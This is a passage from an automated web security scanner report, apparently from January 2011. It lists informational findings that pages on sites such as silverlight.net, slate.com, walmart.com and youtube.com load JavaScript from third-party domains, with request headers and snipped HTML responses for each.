Path:	/learn/videos/spanish-videos/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /learn/videos/spanish-videos/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52595
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:36:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silverligh
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.639. http://www.silverlight.net/privacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/privacy.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /privacy.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19103
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Privacy St
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.640. http://www.silverlight.net/showcase/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/showcase/

Issue detail

The response dynamically includes the following script from another domain:

http://i1.asp.net/script/core/jquery-1.3.2.min.js

Request

GET /showcase/ HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 12551
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Show
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://i1.asp.net/script/core/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.641. http://www.silverlight.net/termsofuse.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/termsofuse.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js

Request

GET /termsofuse.aspx HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

23.642. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.six-telekurs.com
Path:	/tkfich_index/tkfich_home.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.643. http://www.slate.com/id/2282444/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slate.com
Path:	/id/2282444/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://edge.quantserve.com/quant.js
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://js.revsci.net/gateway/gw.js?csid=J05531
http://media.washingtonpost.com/wp-srv/ad/audsci.js
http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js
http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js
http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1

Request

GET /id/2282444/ HTTP/1.1
Host: www.slate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:55:28 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en-US" lang="en-US" xmlns:lookup="XslLookup" xmlns="xhtml"><he
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://media.washingtonpost.com/wp-srv/ad/slate_ad2.js" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/anywhere.js?id=tDoKZOQ1QduBuHW8Q9MXTA&v=1" xmlns=""></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/rev_platform_ads.min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/textlinks/js/utilsTextLinksXML.js">

</script>
...[SNIP]...
<div id="wapo_338542" xmlns=""><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/wapolabs/utils/wapo.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J05531" xmlns="" xmlns:tools="XslTools"></script><script type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/audsci.js" xmlns="" xmlns:tools="XslTools"></script>
...[SNIP]...

23.644. http://www.space.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.space.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.toptenreviews.com/r/c/request.php?path=tmn/space&sub_id=default
http://cdn.gigya.com/js/socialize.js?apiKey=2_YG0V27p3UjOJ3F3KX3aeQMPLvfh2QQxpVD66LktOyTJgGqERj4StoNkEIpmve2X3
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.space.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 10:18:40 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<link rel="shortcut icon" href="/images/site/favicon.ico" />
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_YG0V27p3UjOJ3F3KX3aeQMPLvfh2QQxpVD66LktOyTJgGqERj4StoNkEIpmve2X3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>
<script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/space&sub_id=default'></script>
...[SNIP]...

23.645. http://www.spacedaily.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spacedaily.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js
http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:40 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html
Content-Length: 78931

<HTML><HEAD><TITLE>Space News From SpaceDaily.Com</TITLE>
<META NAME="description" CONTENT="Space News from SpaceDaily.Com brings the space industry professional daily news from the frontier, with con
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Spacewarcom/Homepage/tags.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2
http://platform.twitter.com/widgets.js?ver=3.0.4
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4
http://stats.wordpress.com/e-201104.js

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:03:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

23.647. http://www.thespacereview.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thespacereview.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://media.fastclick.net/w/get.media?sid=58935&m=3&tp=7&d=j&t=n
http://www.apture.com/js/apture.js?siteToken=d0yKxSl
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: text/html
Content-Length: 24875

<html>
<head>
<title>The Space Review: essays and commentary about the final frontier</title>
<link rel="stylesheet" type="text/css" href="/includes/style.css">
</head>

<body bgcolor="#ffffff" topmar
...[SNIP]...
<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=58935&m=3&tp=7&d=j&t=n"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=d0yKxSl" charset="utf-8"></script>
...[SNIP]...

23.648. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js

Request

Response

23.649. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/fun-stuff/your-work-soundtrack/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js

Request

Response

23.650. http://www.ticketcity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketcity.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure.addthis.com/js/200/addthis_widget.js
https://server1gateway.clickandchat.com/include.js?domain=www.ticketcity.com

Request

GET / HTTP/1.1
Host: www.ticketcity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:47 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Content-Length: 68525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-
...[SNIP]...
</script> <script type="text/javascript" src="https://secure.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</style> <script type='text/javascript' src='https://server1gateway.clickandchat.com/include.js?domain=www.ticketcity.com'></script>
...[SNIP]...

23.651. http://www.tigerdirect.com/applications/SearchTools/item-details.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/jsapi

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.652. http://www.transterrestrial.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.transterrestrial.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s19.sitemeter.com/js/counter.js?site=s19transterrestrial
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.transterrestrial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.transterrestrial.com/wordpress/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 75605



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
<center><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

   </script>
...[SNIP]...
</script>

   <script type="text/javascript" language="JavaScript1.2"
   src="http://s19.sitemeter.com/js/counter.js?site=s19transterrestrial">

   </script>
...[SNIP]...

23.653. http://www.unica.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unica.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://api.wipmania.com/jsonp?callback=jsonpCallback
http://www.google.com/jsapi?key=ABQIAAAAuYyvux-ecD-iwkh4feVj2hRy-Dv9CBhWZFnV54OXruV3WxevShSOki_3aL3UnU5umqAVoxcixSt6LA

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/
Set-Cookie: RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/
Date: Sun, 30 Jan 2011 02:03:21 GMT
Expires: Sun, 30 Jan 2011 02:03:21 GMT
lsrequestid: 44298918
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1 - published by
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAuYyvux-ecD-iwkh4feVj2hRy-Dv9CBhWZFnV54OXruV3WxevShSOki_3aL3UnU5umqAVoxcixSt6LA"></script>
...[SNIP]...
</script>
<script src="http://api.wipmania.com/jsonp?callback=jsonpCallback" type="text/javascript"></script>
...[SNIP]...
<div id="tab1banners">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

23.654. http://www.unmannedspaceflight.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unmannedspaceflight.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.655. http://www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://cts.channelintelligence.com/841291_landing.js
http://i2.walmartimages.com/js/ajaxVerBreadcrumbs.js
http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js
http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js
http://i2.walmartimages.com/js/rollups/catalog.jsp
http://i2.walmartimages.com/webanalytics/omniture/s_code.js

Request

GET /cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15
Last-Modified: Sun, 30 Jan 2011 01:50:12 GMT
Content-Language: en-US
Content-Type: text/html;ISO-8859-1;charset=ISO-8859-1
Cache-Control: private, max-age=68
Expires: Sun, 30 Jan 2011 02:05:12 GMT
Date: Sun, 30 Jan 2011 02:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew333 (ew333_7412093952_69769216)
Content-Length: 69886

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Electronics, TV's, Laptops, Digital Cameras, MP3 and DVD Players - Wal
...[SNIP]...

<script src="http://i2.walmartimages.com/js/rollups/catalog.jsp" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i2.walmartimages.com/js/ajaxVerBreadcrumbs.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://i2.walmartimages.com/webanalytics/omniture/s_code.js">
</script>
...[SNIP]...
</IFRAME>
<script type="text/javascript" src="http://cts.channelintelligence.com/841291_landing.js"></script>
...[SNIP]...

<script src="http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js" type="text/javascript"></script>

<script src="http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js" type="text/javascript"></script>
...[SNIP]...

23.656. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://cts.channelintelligence.com/841291_landing.js
http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js
http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js
http://i2.walmartimages.com/js/rollups/catalog.jsp

Request

Response

23.657. http://www.youtube.com/embed/CKZzn00w01M previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/CKZzn00w01M

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed-vfl3l2TAa.js

Request

Response

23.658. http://www.youtube.com/embed/mm8byzo8zWE previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/mm8byzo8zWE

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-embed-vfl3l2TAa.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...
</div>

<script src="//s.ytimg.com/yt/jsbin/www-embed-vfl3l2TAa.js"></script>
...[SNIP]...

23.659. http://www.zacks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296353052?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296353052?
http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296353052?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296353052?
http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296353052?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?
http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
